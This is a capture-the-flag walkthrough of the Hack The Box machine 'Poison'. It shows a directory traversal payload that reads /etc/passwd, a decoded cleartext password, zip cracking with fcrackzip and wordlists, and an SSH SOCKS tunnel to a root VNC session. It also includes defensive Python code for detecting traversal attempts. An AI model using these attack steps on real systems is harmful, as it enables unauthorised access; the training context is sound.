Poison

Poison HTB

Enumeration Stage

Service/Port Scan

NMAP (network mapper)

The nmap scan reveals two services: SSH on port 22 and HTTP on port 80 (Apache 2.4.29 on FreeBSD).

$ nmap -sV -sC -p- -o poison.txt 10.10.10.84                  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 06:00 EDT
Nmap scan report for 10.10.10.84
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Web Application

Overview

We are greeted by a temporary website that is used to test some local scripts. So, let’s test them 🙂

Functionalities test

I am going to test each functionality for hints, security gaps, etc. While poking at the application, I discovered a password backup file via listfiles.php and a directory traversal attack vector in the file= parameter.

# curl http://10.10.10.84/browse.php?file=listfiles.php
Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)
# curl http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

I wrote a short bash loop script to decrypt the password and got:

Charix!2#4%6&8(0

browse.php takes a file name in its file parameter and does not restrict where that name points, which introduces a directory traversal vulnerability and gives access to other sensitive files.

The command below dumps the contents of /etc/passwd, which lists all users on the system.

$ curl http://10.10.10.84/browse.php?file=../../../../../../../../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
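
Added example (not part of the original write-up): a Python check that flags requests like the one above in an Apache access log, including percent-encoded and double-encoded variants. The log lines are constructed samples; the parameter name file is the one browse.php uses above.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache access-log lines (sample data, not taken from the target host).
SAMPLE_LOG = """\
10.10.14.2 - - [14/May/2021:06:10:01 -0400] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192
10.10.14.2 - - [14/May/2021:06:11:40 -0400] "GET /browse.php?file=../../../../etc/passwd HTTP/1.1" 200 1894
10.10.14.2 - - [14/May/2021:06:12:05 -0400] "GET /browse.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1894
10.10.14.2 - - [14/May/2021:06:12:30 -0400] "GET /browse.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
10.10.14.2 - - [14/May/2021:06:13:02 -0400] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1894
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ sequences are also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base_dir(value):
    """True if the value is an absolute path or climbs above its starting directory."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/"):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")

def find_traversal(log_text, param="file"):
    """Return (client, status, decoded_value) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if key == param and escapes_base_dir(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request means the file was served, so those lines are the ones to triage first.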

Now that we have a valid user and a valid password – we’re in!

Privilege Escalation

Foothold

# ssh [email protected]
Password for [email protected]:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!
...[snip]...
[email protected]:~ % 

Enumeration – Files/Writeable/SUID

I discovered a password-protected zip file. I started an HTTP server and transferred the file to my local Kali machine to crack it.

[email protected]:~ % ls
secret          secret.zip      user.txt

[email protected]:~ % unzip secret.zip
Archive:  secret.zip
 extracting: secret |
unzip: Passphrase required for this entry

[email protected]:~ % python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.14.2 - - [14/May/2021 13:36:22] "GET /secret.zip HTTP/1.1" 200 -

Cracking Secret

Trying to crack the password-protected file proved a bit frustrating until I realised I had not reused the password for charix…

# zip2john secret.zip > passtocrack.hash
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/english.txt' secret.zip

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/realhuman_phill.txt' secret.zip

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' secret.zip

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/fasttrack.txt' secret.zip 

┌──(root💀kali)-[/home/kali]
└─# unzip secret.zip  
Archive:  secret.zip
[secret.zip] secret password: 
password incorrect--reenter: 
 extracting: secret    

Looking at the file, I see that it is probably a binary file whose content makes no sense, but since the file was protected and hidden, it may be the “secret” to something to come.

┌──(root💀kali)-[/home/kali]
└─# file secret                                 
secret: Non-ISO extended-ASCII text, with no line terminators

# hexdump -C secret
00000000  bd a8 5b 7c d5 96 7a 21                           |..[|..z!|
00000008

Process Enumeration

I discovered an interesting process called Xvnc. Xvnc is a Virtual Network Computing (VNC) server used for remote desktop connections; it runs as root and has ports 5901 and 5801 open.

[email protected]:~ % ps aux all
....[snip]....
root     529   0.0  0.9  23620  8872 v0- S    11:45     0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/cla
....[snip]...

[email protected]:~ % sockstat -l |grep Xvnc
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*

Accessing the VNC

A good explanation of how we can access it is given in the following intro to SSH tunneling. In short: I check which local port proxychains is configured to use, open the SSH connection with dynamic forwarding (-D) on that port, and then reach the VNC server locally through it, passing the “secret” file from the unzipped archive as the password.

┌──(root💀kali)-[/home/kali]
└─# cat /etc/proxychains4.conf

...[snip]...
socks4  127.0.0.1 9050
...[snip]...

┌──(root💀kali)-[/home/kali]
└─# ssh [email protected] -D 9050
Password for [email protected]:
[email protected]:~ % 

┌──(root💀kali)-[/home/kali]
└─# proxychains vncviewer 127.0.0.1:5901 -passwd secret                                 
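
Added example (not from the original write-up): the tunnel works because a root-owned service bound to 127.0.0.1 is still reachable by any local account or SSH user who can forward ports. This Python helper lists such listeners from sockstat -l output; the Xvnc rows are the ones shown earlier, the header, sshd and httpd rows are constructed.

```python
import ipaddress

# Xvnc rows come from the sockstat output on this page; the rest are constructed.
SAMPLE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     sshd       620   4  tcp4   *:22                  *:*
www      httpd      702   3  tcp6   ::1:8080              *:*
"""

def loopback_listeners(sockstat_text, privileged=("root",)):
    """Return (user, command, pid, port) for TCP listeners that are bound only
    to loopback and owned by a privileged user. Loopback binding keeps remote
    clients out, but not local accounts or forwarded SSH connections."""
    found = []
    for line in sockstat_text.splitlines():
        fields = line.split()
        # Skip the header, UNIX-domain sockets and anything that is not TCP.
        if len(fields) < 6 or not fields[4].startswith("tcp"):
            continue
        user, command, pid, _fd, _proto, local = fields[:6]
        # rpartition keeps IPv6 hosts such as "::1" intact.
        host, _, port = local.rpartition(":")
        if host == "*":
            continue  # wildcard bind: directly exposed, a separate finding
        try:
            is_loopback = ipaddress.ip_address(host).is_loopback
        except ValueError:
            continue
        if is_loopback and user in privileged:
            found.append((user, command, int(pid), int(port)))
    return found

if __name__ == "__main__":
    for user, command, pid, port in loopback_listeners(SAMPLE_SOCKSTAT):
        print(f"{command} (pid {pid}) runs as {user} on loopback port {port}")
```

Each listener it reports should either run as an unprivileged user or sit on a host where SSH port forwarding is restricted for ordinary accounts.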

And we’ve done it. Such a nice box. The owner of the box made the mistake of hosting functionality that introduces a whole plethora of security issues. He also made the mistake of not only reusing his password but also storing it in a file on his local computer. To sum up: we have learned a little bit about tunneling, proxychains, directory traversal and Xvnc.
